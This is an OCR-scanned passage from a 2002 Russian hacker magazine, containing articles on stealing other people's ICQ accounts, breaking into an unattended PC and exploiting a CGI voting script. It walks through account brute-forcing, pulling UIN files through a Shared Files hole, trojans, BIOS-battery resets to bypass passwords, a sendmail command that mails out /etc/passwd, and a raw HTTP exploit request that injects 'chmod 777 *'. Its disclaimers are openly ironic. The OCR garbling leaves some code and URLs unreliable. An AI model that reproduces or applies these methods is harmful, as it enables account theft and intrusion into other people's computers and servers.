апу. Тут лучше всего, если у тебя выделенка или, на 
крайняк, анлима по диал-апу - тогда этот процесс становится более деше- 
вым, спокойным и ненавязчивым. 

Можно долго перебирать номера от балды вручную, но гораздо логичней ав- 
томатизировать процесс и, соответственно, ускорить его в несколько раз. 
Есть такая прога - Assault (http://asechka.ru/downloads/assault3d.zip). 
Она перебирает заданный тобой диапазон номеров (например, от 100000 до 
999999) на предмет наличия рИтагу-мыльников, на которые система ICQ 
высылает забытые пароли. Так вот, задав ей определенный диапазон адре- 
сов и запустив на несколько часов, можно получить список мыл (прога со- 
храняет все в лог), которые останется только проверить на живучесть. А это 
уже можно сделать с помощью программы Advanced Maillist Verify 


(http://www. .таЦи И е$.сот/ату/ату.21р). В нее останется ввести лю- 
бой из найденных адресов и проверить, существует ли он. Assault работает 
с довольно неплохой скоростью даже на диал-апе, примерно по одному ад- 
ресу в секунду. Можешь прикинуть, сколько понадобится времени для ска- 
нирования желаемого диапазона адресов. Да и проверка их на живучесть 
тоже потребует некоторого времени. У меня вот ушло всего пару вечеров по 
несколько часов на поиски, чтобы получить парочку рулезных номеров, и 
еще неделя, чтобы зарегить домены и получить пароли от них. 


УГНАЛИ? 


Если твой короткий нажитый непосильным трудом номер кто-то умудрился 
скомуниздить - вернуть его можно, если ты помнишь тот мыльник, на кото- 
рый высылался пароль при угоне. Может быть потребуется снова создать та- 
кой домен и адрес, но в любом случае, так как Ася высылает номер только на 
тот адрес, который был введен при регистрации, и при угоне пароль успеш- 
но был на него выслан, то это прокатит и в этот раз. Чуешь, чем чревата по- 
купка номера у пиратов? Если они окажутся недобросовестными, то они за- 
просто вернут себе обратно купленный тобой номер, чтобы продать его еще 
кому-нибудь, а на любые претензии ответят: «Ну угнали, ну бывает, а мы-то 


ICQ - ПРОСТОЙ ВЗЛОМ 


тут причем?». Плакал тогда твой номерок и твои денежки. Вот почему лучше 
погиморроиться и угнать самому. Да и будет чем потом гордиться. 

Чтобы избежать того, чтобы кто-то угнал твой номер (это, кстати, касается 
любого случая, даже если ты честный обладатель номера и не хочешь ничего 
ни у кого угонять), нужно принять следующие меры предосторожности. В 
первую очередь сотри и никогда не вводи почтовый адрес, особенно несуще- 
ствующий или с халявной мыльницы. Если Ася свежеугнанная, обязательно 
сотри тот мыльник, который в ней был, а также всю другую инфу о бывшем 
пользователе. Обязательно смени пароль (знаю, что ты это и так понимаешь, 
но на всякий случай напоминаю). Первое время вообще не вводи ничего в 
user info и постарайся, чтобы мыльник, который ты создал для угона, продер- 
жался как можно больше. Убери из настроек Аси авторизацию без твоего со- 
гласия и установи опцию, чтобы другим неавторизованным пользователям не 
был виден твой текущий Online/offline-ctaTyc. Это сделает тебя невидимым 
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для бывшего владельца и, если он не помнит, какой адрес он вводил при ре- 
гистрации, не позволит вернуть свой номер обратно. Через некоторое время 
ты, конечно же, сможешь ввести какую-нибудь инфу, вроде своего ника. Но 
никогда, запомни, НИКОГДА не вводи ничего в поле e-mail. А также оставь оп- 
цию, чтобы незнакомые не могли добавлять тебя в свой контактный лист и 
наблюдать твой текущий статус. Надеюсь, не нужно напоминать, что нельзя 
вводить свой физический домашний адрес, телефон и другую инфу, по кото- 
рой тебя можно найти, лучше тогда повесь себе на входную дверь с внешней 
стороны ключ от ее замка и надпись «Добро пожаловать» :). 

Все эти нехитрые действия уберегут твой номер от посягательств других та- 
ких же, как и ты, умников. 


ЭПИЛОГ 


Как видишь, чтобы стать обладателем модного номера, вовсе не надо что-то 
ломать. Достаточно найти банального лоха, который ничего не знает о тех 
простых правилах защиты, о которых я тебе рассказал. Только вот лохов с 
такими номерами становится все меньше и меньше, а желающих обзавес- 
тись коротким номером становится все больше и больше. Особенно преус- 
певают пираты, у которых это средство заработка. Угнанные однажды номе- 
ра второй раз угнать уже практически невозможно. Исходя из всего этого, 
поторопись, если хочешь стать одним из счастливых обладателей короткого 
номера. Да и сам смотри не облажайся и не лишись собственного номера. 
А вообще, нехорошо все это! Никогда не угоняй номера и используй эту ин- 
фу только в целях защиты! :) 


НАТЯГЫВАЕТ 


Асю 


уводим UIN по-взрослому 


Хрым7 (hrimz@xyligan.ru) 


ИНСТРУМЕНТЫ 


Я буду описывать сразу несколько 1са-клиентов, а также множество до- 
полнительного софта. Кстати, все это только про улп-системы. Для nix” ов 
нужно отдельную статью писать. 


ПРИСТУПИМ! 


Итак, запускаем icq (пока неважно какой версии) и входим в «Find users». 
В поле поиска и1п`а вводим уин-жертву и через мгновение получаем Users 
details. В стандартных 1с4-клиентах, то 
есть от Мирабилис, нас интересует толь- 
ко поле mail. Если у нас есть мыло вра- 
га, то вся операция захвата уина сводит- 
ся к получению доступа к почтовому 
ящику, так как на него можно выслать 
письмо с паролем для забывчивых юзе- 
ров www.icq.com/password/). А потом 
все сводится к полному захвату mail.ru, 
а затем... Шучу, конечно, но мало ли что 
бывает :). В общем, либо нужно рутить 
действующий ящик, либо бывают слу- 
чаи, когда mailbox из-за долгого неис- 
пользования отрубают, и тогда остается 
просто заново зарегистрировать его на 
себя. Но такие случаи, тем более с кра- 
сивыми номерами, бывают ОЧЕНЬ- 
ОЧЕНЬ редко. Не стоит на это надеять- 
ся. Правда, бывает так, что нужно по- 
быстрому достать пару уинов, неважно 
каких, тогда читай статью на тему в этом 
же номере. 

Сразу хочу отметить, что стандартная 
аська совсем не подходит для обшир- 
ных боевых действий. То ли дело 
Miranda ICQ :-). Я использовал при на- 
писании статьи версию 0.1.2.1, навер- 
ное, уже есть новее. Весь кайф Миранды 
в том, что весит она как пушинка, а фи- 
шек полезных много. Например, в ее 
User Details’ ax отображается Т1Р` шник 
хозяина номера, порт, через который 
работает удаленный 1с4-клиент, версия 
самого клиента и скорость пинга. Не- 
плохо для начала :). 

Теперь поговорим немного о добывании 
1р-шника. Можно, кроме миранды, за- 
юзать рульную утилиту и!т21р (версию 
2.12 показала 1р всех онлайновых юзе- 
ров и ни разу не глюкнула, так что сове- 
тую, хотя на mazafaka.ru лежит уже 
3.**). Это прога выдает ip по и!п`у, ес- 
ли заданный юзер в онлайне. Также по- 
сле определения Тр можно сделать 
nslookup. Не отходя от кассы, так ска- 
зать :). Ну, не будем отвлекаться :). Ec- 
ли мы знаем Zlo-ip, то это, в принципе, 
все, что нужно для взлома :). Сразу 
проверяем Xsharez ом Ha NetBIOS, ска- 
ним на открытые порты (например, ip- 
{00[5`ами) и так далее. 


2002 ася во всей 
своей тяжеловесной 
красе... 
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И снова здравствуйте! Прямо здесь и сейчас мы рассмотрим 
все, что касается увода !сд-уина (желательно красивого). 
Способов масса, одни легки в реализации, но в результате 
получишь номер что-то вроде 2447849063587656=). А вот, 
например, для 11111* нужно поработать серым веществом, 
потому что обладатели таких уинов далеко не лохи. Но мы 
ведь тоже не кал-герл читаем, так что не парься. 


рис. Григорий Моргачев 
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Миранда рулит 


КРАДЕМ 


В общем, дальше можно до бесконечности перечислять стандартные спосо- 
бы кражи файлов с удаленного компа (конкретнее номер_аси.да{). Это тро- 
яны, НЛП (можно воспользоваться программой для отсылки сообщений с 


"РВ Бы a паре | 


Смотрим ip спецсредствами! 


других уинов, тем самым под каким-нибудь предлогом узнать пароль, ты 
ведь умеешь пудрить мозги? 0 таких прогах ][ писал неоднократно. Но вот 
что делать, если известен только уин, и все. Решение есть. Качай клевую 
софтину back2icq (http://www.mazafaka.ru/soft/icq/ back2icq.zip). 

Архинужная программка и работает со всеми версиями мирабилисского 
клиента. Самое главное, что она может заниматься bruteforce ом. А ведь это 
очень актуально! Наверняка видел, как на различных а-ля «хакерских» сай- 
тах постятся десятки пар uin/password? Да, но номера там красивые практи- 
чески не попадаются (ну не скажи, я пару раз на NNM.ru такое видал - прим. 
ред.). Вот с помощью таких инструментов, как back2icq, это все и реализует- 
ся. Ставишь диапазон номеров или 1р`шников, натравливаешь софтину Ha 
десятимеговый файл с паролями и оставляешь на пару часов. Вот и завет- 
ные двадцать-тридцать номеров на винте. Но в нашей ситуации нужно за- 
хватить конкретный номер, но для этого в backZicq тоже есть средства. Вот 
основные. Проверка номера на работоспособность (а то вдруг такого еще 
нет), bruteforce для конкретного уина, посылка левых мессаг с других уинов. 
Этого вполне хватит, чтобы немного повоевать. Только будь все-таки осто- 
рожнее - выбирай жертв для обучения из аськиного Search” a. Желательно с 
никами hacker, cool boy и т.д. Эти перцы номер без вопросов отдают :). 


НАТЯГИВАЕМ АСЮ 
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Back 2 icq-hacking, У0... 
ШАРИМ ФИЛЕ 


В последних версиях клиентов есть уже всем, наверное, известная фича - 
Shared Files. То есть можно устроить что-то вроде сервера. Когда ты онлайн, 
любой юзер может качнуть у тебя с винта что-нибудь интересное, но (вро- 
де как) только из той директории, которую ты укажешь. Но это только в Ми- 
рабалисе так думают :). Мы думаем по-другому. 

Просто набери в строке браузера 66.66.66.66:80/путь_к_папке_с_уи- 
ном/файл_уина(К), и номерок скачается к тебе на винт. Вот такие поми- 
доры. Но можно все это реализовать гораздо легче. Для этого идешь на 
mazafaka.ru, качаешь децельную утилиту GetUin, которая автоматизирует 
вышеописанный способ. Прога мздосная, поэтому в командной строке на- 
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Забугорные хацкеры требуют 75 баков за свое 
творение... 


бери getuin 66.66.66.66:80 (можно и без порта, по умолчанию все равно 
80). Софтина сама ищет уин-файл и сливает в свою директорию. Вот насто- 
ящее чудо программерской мысли :). 

Теперь в очереди еще несколько багов всеми любимой аси. Совсем свежень- 
ких. Не успели еще остыть - винты ламеров ждут своей очереди. Итак, подроб- 
нее о дырах. Точнее - крупных и несложных в реализации дырок всего две. 
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Мирабилис предупреждает 


ПЕРВАЯ ДЫРКА 

Этот баг произрастает из уже описанной уязвимости, связанной с Shared 
Files, так что с новьем я тебя немного обманул. Тут фича в том, что в сети ле- 
жит (ищи в архивах http://astalavista.box.sk) 1с4-троян, который функцио- 
нирует только через активную (онлайновую) асю. То есть клиент заливает- 
ся на удаленный комп, и затем с помощью сервера качается уин-файл. На 
момент написания статьи инфа о нем лежит только на забугорных серваках, 
но к моменту выхода номера в продажу можно заглянуть и на WWW.SeCU- 
ritylab.ru или www.xakep.ru. Четкого названия у проги вроде как и нет. 
Просто ленивый, но умный программер написал, а назвать творение забыл 
:). Да и подписаться тоже. Короче, ищи. А если шаришь в кодинге, то и сам 
такое сварганить сможешь. 


ВТОРАЯ ДЫРКА 


Что тут у новенького? Ба-а-а!! Да у нас тут просто рай для хацкера, захотев- 
шего разжиться красивым уином. Всем пользователям облегченной java- 
версии аси - ICQLite (www.icq.com/lite/) - бояться срочно! Баг распростра- 
няется только на нее. В общем, теперь для тебя главное найти юзера аси с 
красивом уином, сидящим на ICQLite. Ничего страшного, такие всегда есть, 
тем более back2icq тебе в помощь. По адресу www.icqhack.com.ua/arti- 
cles/hack/icg/356.htm лежит материал на забугорном, в котором приво- 
дится исходник скрипта на яве, с помощью которого файл опять же упадет 
к нам на винчестер. Скрипт достаточно большой, так что просто сходи по 
линку. Там все расписано подробно. 


ЗАКЛЮЧЕНИЕ 


Вот мы и добыли красивый номерок и уже пытаемся обвешать себя кучей 
фаерволлов, чтобы другой хитропопый хацкер не провернул вышеописан- 
ное с нами. Дам один стопроцентно действенный совет. Не выходи больше 
в Инет - спокойнее будет :). Сейчас такой период на 1сд-сцене, что аськи 
просто тысячами захватываются, так что красивым уинам долго не жить у 
одного хозяина. (Это точно! Такое чувство, что у аськи открылось второе 
дыхание - так все стремятся попасть в ее сети с симпатичным номерком - 
прим. ред.) Сходи, для примера, на ммм. и1п.ги, занимательный онлайн-ма- 
газинчик, знаешь ли :). Удачи! 
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этого номера журнала ты, наверное, не заприметил особого 


( IC т А Em’... тебе, брателло! Конечно, сразу после приобретения 


BES НАПРЯГА 


как пробраться на чужой комп 


Хрым7 (hrimz@xyligan.ru) 


ГРУЗИМСЯ. ЧАСТЬ ПЕРВАЯ 

Во-первых, разберем простейший вариант «физического взлома». 
Допустим, тебе нужно поиметь доступ к компу, но это не есть вариант, 
когда у тебя имеется доступ к машине через Сеть (неважно, локальную 
или глобальную). Наш вариант представляет собой случай, когда ты 
находишься в помещении с компом, а хозяева вернутся не скоро 
(вторжение в частную собственность со взломом, однако). Наш zlo- 
компьютер выключен, и попытки врубить его путем тыканья «пувера» к 
желаемому результату не приводят. Тут, скорее всего, может быть два 
случая. Либо на тачке предусмотрительным хозяином поставлен пароль в 
ВТО5`е на загрузку, либо она просто не подрублена к электросети :). Bo 
втором случае просто ищем вилку и втыкаем куда следует (ну, ты меня 
понял), а первый случай сейчас рассмотрим подробнее. Защита ВТО5`а 
может быть нескольких видов. Соответственно и загрузка компа тоже 
может реализовываться несколькими способами (например, после 
набора пароля на клаве, движения мышки etc). Все эти защиты обходятся 
без напряга путем сброса батареи биоса. То есть нам следует вскрыть 
корпус (четыре винтика выкрутить), найти круглую «таблетку» (она, 
скорее всего, будет как-то обозначена - надписями «BIOS» или «Battery») 
на материнской плате и простым движением руки вынуть и вставить 
обратно. Все! Все настройки компьютера на уровне биоса сброшены в 
дефолтовое (по умолчанию) состояние. Теперь комп будет грузиться 
обычным образом, то есть сразу после нажатия пимпы «Power. Сейчас 
объясню, почему это происходит. Как ты, наверное, заметил, после 
выключения компьютера сохраняется много интересных вещей, хотя комп 
и может не быть подключен к электросети. Ведь системное время как-то 
все-таки отсчитывается! Весь этот ста# работает после выключения 
только от одной этой батарейки. А после сброса ее вся инфа 
возвращается в первоначальное состояние (включая пароль на загрузку). 
Что нам с тобой и требовалось. 


НЕМНОГО ПРЕДОСТЕРЕЖЕНИЙ 

Ну и, как обычно, надо бы тебя 
предупредить, что все, что здесь описано, 
совсем не обязательно юзать в 
деструктивных целях порчи чужого ЭВМ, а 
может быть использовано для вполне 
мирных действий ака установление своего 
компа в рабочее состояние. Ведь бывают 
случаи, когда пассворд забылся, нужно другу 
помочь, ну и так далее. Я это все к чему пишу 
тут? Да к тому, что ни автор, ни редакция 
ничего тебе не несут (в смысле последствии), 
кроме знаний, конечно. 


024 december/12/2002 


подвоха. Но дело в TOM, что в этот раз тема «Спеца» 
несколько оригинальна, так что не сразу можно догадаться, 
о чем здесь пойдет речь. Легкий хак - это все-таки не 
совсем просто, а базовые вещи знать все же надо :). В 
общем, здесь и сейчас мы разберем несложные методы 
взлома компьютера нехорошего юзера от и до. 


рис. Юрий Никитин 


Ну вот, теперь хотя бы вражеская машина загорелась диодами и начала 
подавать первые признаки жизни. Но очередное западло юзера не 
заставляет себя ждать. Что это может быть - сейчас узнаешь 2). 


ГРУЗИМСЯ. ЧАСТЬ ВТОРАЯ 


Вот уже процесс загрузки пошел, но теперь перед нами встает другая 
трабла. На экране светится инфа о модели и версии биоса и количестве 
винтов, но через пару секунд вылетает стремное окошко (или что там еще 
обычно вылетает :) с просьбой ввести пароль. Но тут ситуация тоже 
может иметь несколько истоков, а решение, как всегда, универсальное :). 
Во-первых, загрузка оси может быть защищена различным софтом, 
который можно надыбать в Инете, а во-вторых, у юзера может быть не 
одна ось (пресловутая винда), а несколько (пресловутые никсы). Тогда в 
качестве загрузчика может юзаться как стандартное Lilo, так и какой- 
нибудь Partition Magic. Но нам все по пистолету - мы парни со смекалкой 
:). Поэтому сначала перезагружаем машину и при появлении первой 
инфы жмем «Delete», тем самым попадая в биос (кстати, если глупый юзер 
поставил пароль и на вход в биос, то не стоит париться, так как сброс 
«чудо-батарейки» уже все исправил). Ну так вот. Bios перед нами во всей 
красе. Теперь следует перейти в раздел с настройками порядка загрузки 
системы. Это что-то вроде «Advanced BIOS features->First boot device» 
(пример из AWARD овского биоса, так как OH наиболее популярен). 
Устанавливаем в порядке на первое место либо Floppy, либо CD-ROM, в 
зависимости от того, с чего грузиться будем. Сохраняем настройки и 
уходим в ребут. 


ГРУЗИМСЯ. ЧАСТЬ ТРЕТЬЯ (ЗАКЛЮЧИТЕЛЬНАЯ) 


(Сейчас подробнее поговорим о том, с чего следует грузиться. Банально, 
но это может быть просто загрузочная дискетка или компакт, который 
предварительно приготовился в винде. В этом случае либо грузим 
полноценную винду, либо работаем через черный dos. Если у тебя 
компакт-диск, то можно предварительно записать туда множество 
полезного вареза типа загрузчиков, переборщиков паролей, троянов и 
т.д. Диск на все виды загрузок, так сказать. Ну а если у тебя нет CD-R или 
ты просто любишь минимализм, то можно записать чудо-дискету, на 
которой уместится дистрибутив п1х-ов с загрузчиком и десяток мелких, HO 
очень необходимых утилит. 06 этом, кстати, подробно писал nOah в одном 
из прошлых Спецов. Так что не пропускай номеров :). 


ВХОДИМ В СИСТЕМУ 


Ну вот, теперь, наконец-то, мы добрались до самой системы. Скорее всего, 
по статистике, это либо win, либо *nix. Радости эта инфа не приносит, так 
как современные оси неплохо защищены от вторжения извне (все равно 
все что угодно натянуть можно :). Но мы, конечно же, попробуем 
прорваться, да и еще без напрягов особых. Тема номера обязывает все- 
таки :). Если это Win9x/ME, то проблем не будет. Просто при появлении 
окна с просьбой ввести логин и пасс жмакаем отмену или вводим любое 
имя от балды, подтверждаем, что хотим создать нового пользователя, а в 
конце работы просто в разделе «Панель управления -> Пользователи» 
удаляем нашего юзера. В случае же Win2000/XP придется попотеть, но 
совсем чуть-чуть или вообще ничего не выйдет. Можно попробовать 
заюзать гостевой доступ, то есть в качестве логина пароля ввести 
guest/guest или вообще просто логин. Может и прокатить, если юзер 
совсем ушастый, но, судя по тому, что у него на всем пароли и несколько 
осей стоит, вряд ли пройдет :). Но есть решение всех проблем - наш чудо- 
загрузочный сидючок/дискеточка. Грузимся и с нее же работаем. Да, если 
ты записал на нее линух, то можешь просто примонтировать win 


ЛОМАЕМ БЕЗ НАПРЯГА 


(fat16/32) разделы и качать заветное филе. В общем-то, если хочешь 
вписываться в философию легкого хака и спокойно при этом иметь 
win2k/XP, то вряд ли получится :) Тут серьезнее поработать надо. 


ДЕСАНТИРУЕМ 210!!! 


Наконец-то! Мы пробрались в логово врага. Теперь пора творить 
беспредел. Грабить, убивать, насиловать... Да, сорри, задумался. Система 
в наших руках, и теперь приступаем к высадке софта (ну или просто 
сливанию паролей, смотря каковы были твои первоначальные цели). В 
конце ужасных бесчинств с чужим компьютерным имуществом постим 
похабный wallpaper и сваливаем. 


ЗАКУСЬ 


На сладкую закусь - интересная инфа, которую любезно предоставил 
Дронич. Однажды он обходил запрет запуска ехешников спецсофтом. 
Ситуация примерно такая. На компе, временно отданном в пользование 
симпатичной девчонке, был выставлен запрет на запуск всех ехешников, 
кроме ворда (таких утилит в Сети много, Дронич юзал Хмурого Админа). А 
когда комп вернули, оказалось, что снять защиту не удается, так как сама 


программа для снятия защиты тоже ехе-файл :). Рулез: а-ля «драйвера к 
модему на сидюке, а драйвера к сидюку в Инете» :). Но для нас нет 
преград, особенно пока у нас есть такие хитропопые редакторы, как 
Дронич (вот уж обласкал - прим. ред.). Поскрипев немного для приличия 
мозгами, он загрузился с дискетки, на которой лежал «ХА», запустил 
regedit под dos и добавил ключ по адресу HKEY_LOCAL_MACHINE\SOFT- 
WARE\Microsoft\Windows\CurrentVersion\RunOnce. Содержимое ключа - 
это полный адрес к ехешнику нашей проги-запрещалки (А:\НА.ехе). 
Ребутимся. Софтина запускается с правами системы и позволяет 
отключить запрет. Мораль: если на компе загружается система, но доступ 
к файлам и прогам ограничен, поступаем как Дронич и отключаем все 
запреты. С маленькой разницей - мы разрешаем то, чего не запрещали :). 


УСЕ 


Ну вот, здесь я рассмотрел несколько простых способов легкого взлома. 


Знаешь другие? Пиши на hrimz@xyligan.ru. 
=r 
= 
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ищем бажную CGI 


Вот ты, наверное, постоянно читаешь наш журнал и 
думаешь: «Все-таки это не для меня. Это слишком сложно. А 
вот это непонятно». Но теперь пришло то время, когда мы 
расскажем тебе о том, как можно быстро и без особых 
напрягов сломать какой-нибудь сервак. Ну что, заинтриговали 
мы тебя? Если да, то читай дальше, ничего сложного в этой 
статье нет, и если ты хоть немного представляешь себе то, 
как работает сервер, и чуть-чуть знаешь С или Perl, ты сразу 
же разберешься со всем этим и будет настоящим кул 
хаксором. 


Скрыпников Сергей aka Slam (sergey@soobcha.org) 


ТЕОРИЯ 
Сегодня такие вещи, как гостевая книга, поиск по серверу, форма для от- 
правки сообщений, - неотъемлемый атрибут практически любого серьез- 
ного сайта. Да что серьезного, теперь даже на домашние странички ста- 
раются запихнуть как можно больше всевозможных анкет, голосований и 
ТУ): 
Для начала, думаю, надо разобраться с понятиями (вообще разборки и 
понятия - сегодня очень актуально :). CGI-ckpunt - это программа, кото- 
рая выполняется на Web-cepsepe по запросу клиента. А клиент, как ты по- 
нимаешь, - это не кто иной, какты ;). Программа эта принципиально ни- 
чем не отличается от обычных программ, которые установлены на твоем 
компе - будь то Word или Quake. CGI - это не язык программирования, на 
котором написан скрипт, a Common Gateway Interface - специальный ин- 
терфейс, с помощью которого и происходит запуск скрипта и взаимодей- 
ствие с ним. 
Как работает CGI-ckpunt? Я, конечно, могу впихнуть тебе какое-нибудь 
техническое руководство, но пользы от этого будет мало. Поэтому объяс- 
ню, как все происходит, на пальцах. Итак, посетитель страницы заполня- 
ет поля формы, например, для записи в гостевую книгу. После этого он 
нажимает кнопку «Submit» (ну или какую-либо другую, например, «От- 
править»), которая и запускает с91-скрипт. Скрипт выполняет запрограм- 
мированные действия - в данном случае считывает данные из формы и 
пишет их в файл гостевой книги - и посылает в твой браузер обычный 
HTML-kog, например, сообщение: «Чувак, ты свободен. Все уже сделано. 
Тебя ждет подружка». 


Общая цель CGI-ckpuntos - позволить тебе получать доступ лишь к опре- 
деленной части информации, находящейся на сервере. Такое определе- 
ние сразу должно навести тебя на мысли о том, что ты можешь каким-то 
способом получить доступ и ко всей информации на сервере. Ни один 
сервак нельзя считать на 100% защищенным (ломают и ***.gov). Наибо- 
лее часто встречающаяся уязвимость - это отсутствие проверки посылае- 
мых скрипту данных на метасимволы (такие, к примеру, как &;`‘\«|* 
2-<>^()[]{}$), что приводит к выводу скриптом содержимого фай- 
ла или самого файла. Элементарным решением этой проблемы есть филь- 
трация вводимого набора символом, выглядящая на Perl следующим обра- 
зом: 


$in =~ 5/([;<>\*\Г $ (\) АИТ 1$ 1/9; 


Как работает СС1-скрипт? Я, конечно, 

могу впихнуть тебе какое-нибудь 
техническое руководство, но пользы от этого 
будет мало. Поэтому объясню, как все 
происходит, на пальцах. 
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рис. Юрий Костомаров 


Мне кажется, люди, которые пишут скрипты, - совсем ленивые и забыва- 
ют 06 этом или не хотят запоминать, т.к. самую элементарную проверку 
на символы «/» и «..» до сих пор не делают, а потом, однажды зайдя на 
свой сервак, видят «][/-\|<ED Бу ...». 

Думаю, теперь ты немного представляешь себе работу сервера и CGI- 
скриптов. Настало время объяснить тебе, что такое эксплойт. Эксплойт 
(«калька» с английского «exploit») - это уязвимость, для которой разра- 
ботан конкретный метод атаки. Многие эксплойты публикуются в откры- 
тых источниках, и рано или поздно для них создаются «заплатки» (патчи), 
устраняющие уязвимость. Будем надеяться, что админ того сайта, который 
ты хочешь сломать, ленивый и не будет ставить никаких патчей. Скажу 
сразу, что самыми распространенными ошибками являются: 

1. Выполнение команды. 

2. Чтение файла. 

3. Запуск программ. 

4. Ошибки sendmail. 

5. 005 атака на скрипт. 


Ошибка в sendmail поможет тебе овладеть серваком так. 

Запуск sendmail: sendmail -f sergey@soobcha.org, Hi, pipiska.txt. Эта 
команда отправит Ha мое мыло файл pipiska.txt. Естественно, вместо 
pipiska.txt лучше заказать файл /etc/passwd :). 


ПРАКТИКА 


Итак, надеюсь, ты уже достаточно теоретически подготовлен и теперь 
сможешь сделать что-нибудь более или менее полезное. 

Сначала ты должен определиться с тем, нужно ли тебе это или нет? Если 
нужно, то выбирай себе жертву, только хочу сразу предупредить: не пы- 
тайся ломать всякие WWW.VVp.ru и м/м. паза.до\, т.к. отделение «Р» в на- 
шей стране не спит, а ты потом все свалишь на меня :). Если жертва уже 
выбрана, то иди и качай CGI-ckaHep. Ты не знаешь, что это такое? Тогда те- 


ДЕТСКИЙ ВЗЛОМ 


ЗАПОМНИ! Статья нацелена прежде всего на то, 
чтобы показать тебе, каких ошибок ты не должен 
допускать на своем собственном сайте. 

Если ты сломаешь что-нибудь и дело дойдет до су- 
да, то тебе грозит: 

Статья 272 УК РФ. Неправомерный доступ к ком- 
пьютерной информации. 

1. Неправомерный доступ к охраняемой законом 
компьютерной информации, то есть информации 
на машинном носителе, в электронно-вычисли- 
тельной машине (ЭВМ), 

системе ЭВМ или их сети, если это деяние повлекло 
уничтожение, блокирование, модификацию либо 


Наша палочка-выручалочка 


бе в Спец №11(22), там я давал сравнительный обзор самых юзаемых и копирование информации, нарушение работы 
удобных CGI - чекеров. Я буду показывать тебе все на примере VoidEyezk. ЭВМ, системы ЭВМ или их сети, - наказывается 
Значит, с настройками ты и сам разберешься, интерфейс понятен и мла- штрафом в размере от двухсот до пятисот мини- 
денцу. Задаем сервак и ждем несколько минут ;). Итак, при сканировании мальных размеров оплаты труда или в размере за- 
на www.kronex.ru найден скрипт tigvote.cgi. «Ну и что?» - скажешь ты. А работной платы или иного дохода осужденного за 


то, что теперь бегом на www.void.ru, ищи там статью «С61-ЖУКС - подроб- 


но и по-русски» и ищи там эксплойт. Читаем: период от двух до пяти месяцев, либо исправитель- 


ными работами на срок от шести месяцев до одного 

«TIGVOTE.CGI года, либо лишением свободы на срок до двух лет. 
Местонахождение: /cgi-bin/tigvote.cgi (как раз где мы нашли). 2. То же деяние, совершенное группой лиц по ee 
Уязвимость: предварительному сговору или организованнои 
Данный скрипт позволяет организовывать голосование на сайте, и имя группой либо лицом с использованием своего слу- 

айла с базой по голосам передается скрипту как параметр. При внима- 
ф pee bey. alee wee жебного положения, а равно имеющим доступ к 
тельном рассмотрении исходного текста скрипта можно найти место, где 
происходило чтение данных формы и присвоение некой переменной име- ЭВМ, системе ЭВМ или их сети, - наказывается 


ни файла: штрафом в размере от пятисот до восьмисот мини- 
$in = $ENV{\QUERY_STRING\'}; 


@temp=split /&/,$in; мальных размеров оплаты труда или в размере за- 

$in=@temp[1]; работной платы, или иного дохода осужденного за 

ati ae / ean ый период от пяти до восьми месяцев, либо исправи- 
ileName=\'vote\’.@temp[1].\’.txt\; 

$fileIP=\'ip-V..$fileName; тельными работами на срок от одного года до двух 

Как ты видишь, отсутствует проверка на различные символы, в том числе лет, либо арестом на срок от трех до шести меся- 

и | \/. Двигаясь дальше, мы видим строку open FILE,»$fileName»;. Не про- цев, либо лишением свободы на срок до пяти лет. 


исходит стандартной обработки переданной строки, и все небуквенно- 
цифровые символы передаются в ицепсофе, посему из браузера не удаст- 
ся осуществить эксплуатацию уязвимости. 


Использование: POST /cgi-bin/tigvote.cgi HTTP/1.1 

Ниже следует пример запроса, который исполнит команду echo Hi на xo- Accept: */* 

сте-жертве. Отдать такой запрос можно, к примеру, неткатом (почти ToT  Accept-Language: ги 

же телнет): Content-Type: application/x-www-form-urlencoded 
[hax0r@foo.com]$ cat zapros Accept-Encoding: gzip, deflate 


User-Agent:Agent Smith 
Host: www.kronex.ru 
Content-Length: 33 
Connection: Keep-Alive 


file=chmod 777 * |&tigvote=cho+hi 
[hax0r@foo.com]$ пс www.victim.com < zapros > out.log». 


Bot u все ;). Ты думал, это сложно? Оказывается, легче некуда ;). Но учти, 
что количество серваков с дырявыми скриптами уменьшается (я имею в 
виду те серваки, которые интересно ломать, а не www.vasiapupkin.h1.ru). 


Если у тебя появятся какие-либо вопросы, мой мыл всегда открыт для тебя. 
Автор не имеет никакого отношения к взлому, ему все 
это приснилось. И вообще я - Менделеев :). 


= 
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GAMEZ2)- 


FOR FREE 


оменко Зоя AKA DasaDa (kammi@yandex.ru) 


Конечно, последний случай крайне не рекомендуется, потому что чреват 
различными неприятностями - если ты часто будешь так вот сидеть в клу- 
бах на халяву, то, скорее всего, это очень скоро заметят админы и в луч- 
шем случае выкинут тебя из клуба без права дальнейшего его посещения. 
Но вот если ты оплатил, скажем, час, но проиграешь сверх нормы, то тут 
все зависит от величины клуба, количества пользователей, бдительности 
админов и качества их софта. Как правило, из личного опыта, поиграть на 
полчаса или час больше (особо тоже лучше не наглеть) прокатывало поч- 
ти что всегда и без особых последствий. В крайнем случае все списыва- 
лось на ламерское «...ой, правда, что ли, больше сижу? Не может быть. 
Наверное, какая-то ошибка». Только вот с Инетом такое не прокатывало - 
он намертво блокировался по окончании времени, но, возможно, в неко- 
торых клубах и это тоже можно обойти. Как же получить такой бесплат- 
ный BONUS-time? А очень просто, но в начале немного теории, которая 


может тебе помочь справиться с какими-нибудь более навороченными за- 
щитами, которые не попадались мне. Все, что тут будет описываться, сто- 
пудово работало в трех довольно известных и крупных компьютерных 
клубах, названия которых я по понятным причинам не скажу. В любом 
случае, это, скорее всего, сработает в любом клубе. 


Любой компьютерный клуб, как правило, представляет собой компьютер- 
ную сеть Ha N-Hoe количество машин, одного-двух игровых серверов, раз- 
личного сетевого оборудования и собственно админского компа, на кото- 
ром установлен софт для удаленного администрирования машинами в иг- 
ровых залах. С помощью такой программулины админ может вести учет 
времени для каждого компа, перезагружать машины, блокировать или от- 
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ключать их, а также поменять твой комп на дру- 
гой с переносом всей статистики - в случае фа- 
тального сбоя в работе этого компа. Сюда же он 
вводит инфу, сколько юзер заплатил. Еще этот 
софт автоматически блокирует пользователь- 
ский комп по истечении оплаченного времени, 
после чего он не воспринимает никакие коман- 
ды с клавы или мыши и даже при перезагрузке 
reset‘oM по-прежнему остается заблокирован- 
ным (иногда выдавая на экран дурацкие надпи- 
си типа «время кончилось» и т.д.). Также, в за- 
висимости от сложности этого софта, могут 
иметься функции наблюдения за тем, что дела- 
ется на твоем экране, и управления этим. Так 
что поосторожней там, когда при работе в Ине- 
те в клубе будешь вводить пароль от своей шес- 
тизначной аськи или красивого имени почтово- 
го ящика или сайта. Так вот. Как правило, на 
пользовательских машинах ставят Windows 98, 
